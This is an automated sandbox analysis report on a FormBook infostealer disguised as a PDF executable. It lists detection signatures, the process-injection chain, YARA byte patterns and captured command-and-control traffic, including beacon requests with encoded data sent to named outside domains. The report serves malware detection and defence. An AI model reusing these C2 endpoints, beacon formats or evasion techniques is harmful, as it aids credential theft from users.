Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Product Data Specifications_PDF.exe

Overview

General Information

Sample name:Product Data Specifications_PDF.exe
Analysis ID:1519456
MD5:94cc1457803df28f1d4c7a39db96e956
SHA1:0b1f19f44e162dcc5e06d5619b0e72d3e654293b
SHA256:64f6025326f3f7edca173d44ef56a85198b28c132b7e0afd3b599ccc3b593624
Tags:exeuser-TeamDreier
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected Powershell download and execute
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Product Data Specifications_PDF.exe (PID: 2816 cmdline: "C:\Users\user\Desktop\Product Data Specifications_PDF.exe" MD5: 94CC1457803DF28F1D4C7A39DB96E956)
    • svchost.exe (PID: 7336 cmdline: "C:\Users\user\Desktop\Product Data Specifications_PDF.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • EyHLOQmzGKBL.exe (PID: 2340 cmdline: "C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • cmdl32.exe (PID: 7556 cmdline: "C:\Windows\SysWOW64\cmdl32.exe" MD5: BD60DF43E6419AFE39B3FCBFB14077E7)
          • EyHLOQmzGKBL.exe (PID: 6908 cmdline: "C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7836 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.3153614181.00000000030E0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000C.00000002.3153614181.00000000030E0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2c4e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1456f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    0000000C.00000002.3158487172.00000000033F0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000C.00000002.3158487172.00000000033F0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2c4e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1456f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000009.00000002.1764340850.0000000003520000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 13 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        9.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          9.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2f5e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x17672:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          9.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            9.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2e7e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16872:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Product Data Specifications_PDF.exe", CommandLine: "C:\Users\user\Desktop\Product Data Specifications_PDF.exe", CommandLine|base64offset|contains: Z, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Product Data Specifications_PDF.exe", ParentImage: C:\Users\user\Desktop\Product Data Specifications_PDF.exe, ParentProcessId: 2816, ParentProcessName: Product Data Specifications_PDF.exe, ProcessCommandLine: "C:\Users\user\Desktop\Product Data Specifications_PDF.exe", ProcessId: 7336, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Product Data Specifications_PDF.exe", CommandLine: "C:\Users\user\Desktop\Product Data Specifications_PDF.exe", CommandLine|base64offset|contains: Z, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Product Data Specifications_PDF.exe", ParentImage: C:\Users\user\Desktop\Product Data Specifications_PDF.exe, ParentProcessId: 2816, ParentProcessName: Product Data Specifications_PDF.exe, ProcessCommandLine: "C:\Users\user\Desktop\Product Data Specifications_PDF.exe", ProcessId: 7336, ProcessName: svchost.exe

            Suricata Signatures

            No Suricata rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: Product Data Specifications_PDF.exeAvira: detected
            Multi AV Scanner detection for submitted file
            Source: Product Data Specifications_PDF.exeReversingLabs: Detection: 55%
            Yara detected FormBook
            Source: Yara matchFile source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.3153614181.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3158487172.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1764340850.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1764028622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3150227447.0000000002B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.3155322481.0000000000740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1764711374.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3158420814.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: Product Data Specifications_PDF.exeJoe Sandbox ML: detected
            Source: Product Data Specifications_PDF.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: EyHLOQmzGKBL.exe, 0000000B.00000002.3150184532.0000000000C2E000.00000002.00000001.01000000.00000005.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3158489815.0000000000C2E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: cmdl32.pdbGCTL source: svchost.exe, 00000009.00000003.1733070057.0000000003025000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1733005926.000000000301B000.00000004.00000020.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000B.00000002.3155445381.0000000001368000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: Product Data Specifications_PDF.exe, 00000006.00000003.1378207323.00000000047E0000.00000004.00001000.00020000.00000000.sdmp, Product Data Specifications_PDF.exe, 00000006.00000003.1378088013.0000000004640000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1668357541.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1764371082.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1666529619.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1764371082.000000000379E000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3158930427.0000000004DC0000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3158930427.0000000004F5E000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000003.1783633170.0000000004C14000.00000004.00000020.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000003.1781322079.0000000004A6B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: cmdl32.pdb source: svchost.exe, 00000009.00000003.1733070057.0000000003025000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1733005926.000000000301B000.00000004.00000020.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000B.00000002.3155445381.0000000001368000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Product Data Specifications_PDF.exe, 00000006.00000003.1378207323.00000000047E0000.00000004.00001000.00020000.00000000.sdmp, Product Data Specifications_PDF.exe, 00000006.00000003.1378088013.0000000004640000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000009.00000003.1668357541.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1764371082.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1666529619.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1764371082.000000000379E000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, cmdl32.exe, 0000000C.00000002.3158930427.0000000004DC0000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3158930427.0000000004F5E000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000003.1783633170.0000000004C14000.00000004.00000020.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000003.1781322079.0000000004A6B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: cmdl32.exe, 0000000C.00000002.3159746980.00000000053EC000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3155201371.0000000003178000.00000004.00000020.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000279C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2081521933.0000000020B1C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: cmdl32.exe, 0000000C.00000002.3159746980.00000000053EC000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3155201371.0000000003178000.00000004.00000020.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000279C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2081521933.0000000020B1C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,6_2_00452492
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00442886
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,6_2_004788BD
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,6_2_004339B6
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,6_2_0045CAFA
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00431A86
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,6_2_0044BD27
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_0045DE8F FindFirstFileW,FindClose,6_2_0045DE8F
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_0044BF8B
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_02BAC980 FindFirstFileW,FindNextFileW,FindClose,12_2_02BAC980
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 4x nop then xor eax, eax12_2_02B99B30
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 4x nop then pop edi12_2_02B9E4DF
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 4x nop then mov ebx, 00000004h12_2_04C104DE
            Source: Joe Sandbox ViewIP Address: 162.0.238.43 162.0.238.43
            Source: Joe Sandbox ViewIP Address: 45.114.171.236 45.114.171.236
            Source: Joe Sandbox ViewIP Address: 84.32.84.32 84.32.84.32
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_004422FE InternetQueryDataAvailable,InternetReadFile,6_2_004422FE
            Source: global trafficHTTP traffic detected: GET /vzgx/?fRr0=tfAptZ&Z0=fAt7pIVPpGXAvBzcGITPA7OHGvP4drUtR0TDZSipM2iZbUNyxYUxCE+UHA0v6t9lkzzVyERFWiUA+TPVxmGbgZvp38A33fVcU72oeaDS2r7GjI1g6DEPKEsN3N2XW07UJj8EjHQ8jzqg HTTP/1.1Host: www.trapkitten.websiteAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
            Source: global trafficHTTP traffic detected: GET /toq1/?Z0=uFBHOFjbtFvxqkces1RGqIZYNgmiur5XIDe+8RHTfxNdoahKRW8Ulx3EiPWAiOWTg+KGn77UKm1RYG+ByVGjA2HLhLGNIPNt7CZLxVcbhsRd+xmlQzDGNJYRcWCQEWce52MF6lNTmRQD&fRr0=tfAptZ HTTP/1.1Host: www.qwefs.orgAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
            Source: global trafficHTTP traffic detected: GET /wc8m/?fRr0=tfAptZ&Z0=LNw/HBPP4tr5bvxS3kL5kO0L1X3Nhxx3YB7NlE9rWxPCxu7fGi7WEXTbZRsRhvhxvKZ1WqSKGQ11o+IxPCwZhMc0vkrsKf8OYx9AcoiAA17H2AQJPV0Zg3KmaIPVvP4iA0nhUXGrqtBT HTTP/1.1Host: www.dfmagazine.shopAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
            Source: global trafficHTTP traffic detected: GET /za6x/?fRr0=tfAptZ&Z0=EgAkyEJNK52+6mt0ZZzaOaTRCjAqhTrWwvgRo5oIQtO9ZSuXgOHTRb0W4iTGk1GYFMCByhdBFH2COuTwpe8yjCAk5/Of1W40SqKn8hyiq9h4asN2CcaU88uOnsZx5gwZ1TVihW9sV3GM HTTP/1.1Host: www.disn-china.buzzAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
            Source: global trafficHTTP traffic detected: GET /gekb/?Z0=5z2j4JvjBCmnxDGlKBgzTD3+HUD/dd2fumCOi9/ZiiqSem4bSPmiTeLNTUQRFOSACWspsHfkjQi2G8tl0kaRWA67inr6j8yvx+6PXqz9iyZ5+RA70tZ4RmMUT5lyJ2S3VdPbvKQVdTVJ&fRr0=tfAptZ HTTP/1.1Host: www.kevin-torkelson.infoAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
            Source: global trafficHTTP traffic detected: GET /to69/?Z0=jnxbIh9toY3Lk084faTvVBMEFxwUktgIZy5Q1YpSMvmzprTTtz9cwA3B/bTtN1ehZaJt7UsIXSNTUbHOXFDXB9gkhdqEj3u6wGNYEX9l8USgN38burlDvemyCHtOx57idtfraeuBs8os&fRr0=tfAptZ HTTP/1.1Host: www.mandemj.topAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
            Source: global trafficDNS traffic detected: DNS query: www.trapkitten.website
            Source: global trafficDNS traffic detected: DNS query: www.qwefs.org
            Source: global trafficDNS traffic detected: DNS query: www.dfmagazine.shop
            Source: global trafficDNS traffic detected: DNS query: www.mktimediato.online
            Source: global trafficDNS traffic detected: DNS query: www.disn-china.buzz
            Source: global trafficDNS traffic detected: DNS query: www.kevin-torkelson.info
            Source: global trafficDNS traffic detected: DNS query: www.mandemj.top
            Source: unknownHTTP traffic detected: POST /toq1/ HTTP/1.1Host: www.qwefs.orgAccept: */*Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brOrigin: http://www.qwefs.orgContent-Length: 215Cache-Control: no-cacheContent-Type: application/x-www-form-urlencodedConnection: closeReferer: http://www.qwefs.org/toq1/User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)Data Raw: 5a 30 3d 6a 48 70 6e 4e 31 66 4b 76 6d 69 46 39 45 45 53 6a 46 5a 6e 7a 70 35 36 41 68 65 4c 71 61 59 69 53 54 76 66 37 51 47 31 53 6a 5a 7a 68 74 6c 53 62 30 63 4c 7a 45 47 6e 67 64 53 30 6e 72 65 4d 69 36 48 6a 78 34 36 36 4f 6b 6c 52 62 54 6e 69 67 33 6d 68 52 57 79 7a 72 70 79 35 44 74 42 41 6d 53 5a 70 68 6e 63 6c 75 38 4a 6e 79 6e 61 78 45 44 7a 43 43 34 38 35 4a 54 2b 6f 4b 58 78 41 37 6d 77 53 74 69 4d 31 69 41 38 39 51 6f 62 62 34 4d 55 6d 54 62 6c 45 4f 2f 47 47 52 78 4c 71 61 65 4f 6f 4d 30 76 6f 43 74 4a 65 65 6f 31 38 6f 45 30 78 73 75 7a 58 58 30 65 79 71 35 70 65 37 34 42 6c 33 58 32 43 2f 6c 52 55 49 71 62 57 2f 51 3d 3d Data Ascii: Z0=jHpnN1fKvmiF9EESjFZnzp56AheLqaYiSTvf7QG1SjZzhtlSb0cLzEGngdS0nreMi6Hjx466OklRbTnig3mhRWyzrpy5DtBAmSZphnclu8JnynaxEDzCC485JT+oKXxA7mwStiM1iA89Qobb4MUmTblEO/GGRxLqaeOoM0voCtJeeo18oE0xsuzXX0eyq5pe74Bl3X2C/lRUIqbW/Q==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 13:24:03 GMTContent-Type: text/htmlContent-Length: 634Connection: closeServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 70 61 67 65 3d 22 34 30 34 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 68 31 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 68 31 3e 3c 70 3e d0 92 d0 be d0 b7 d0 bc d0 be d0 b6 d0 bd d0 be 2c 20 d0 b2 d1 8b 20 d0 be d1 88 d0 b8 d0 b1 d0 bb d0 b8 d1 81 d1 8c 20 d0 bf d1 80 d0 b8 20 d0 bd d0 b0 d0 b1 d0 be d1 80 d0 b5 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d0 b0 2c 20 d0 b8 d0 bb d0 b8 20 d1 81 d1 81 d1 8b d0 bb d0 ba d0 b0 2c 20 d0 bf d0 be 20 d0 ba d0 be d1 82 d0 be d1 80 d0 be d0 b9 20 d0 b2 d1 8b 20 d0 bf d1 80 d0 be d1 88 d0 bb d0 b8 2c 20 d1 83 d1 81 d1 82 d0 b0 d1 80 d0 b5 d0 bb d0 b0 2e 3c 2f 70 3e 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6a 69 6e 6f 2e 72 75 22 3e d0 94 d0 b6 d0 b8 d0 bd d0 be 3c 2f 61 3e 3c 2f 70 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 64 69 76 20 69 64 3d 22 72 6f 6f 74 22 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 70 61 72 6b 69 6e 67 2d 73 74 61 74 69 63 2e 6a 69 6e 6f 2e 72 75 2f 73 74 61 74 69 63 2f 6d 61 69 6e 2e 6a 73 3f 31 2e 32 35 2e 32 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> 404. </title></head><body><noscript><h1> 404. </h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 26 Sep 2024 13:25:09 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 26 Sep 2024 13:25:12 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
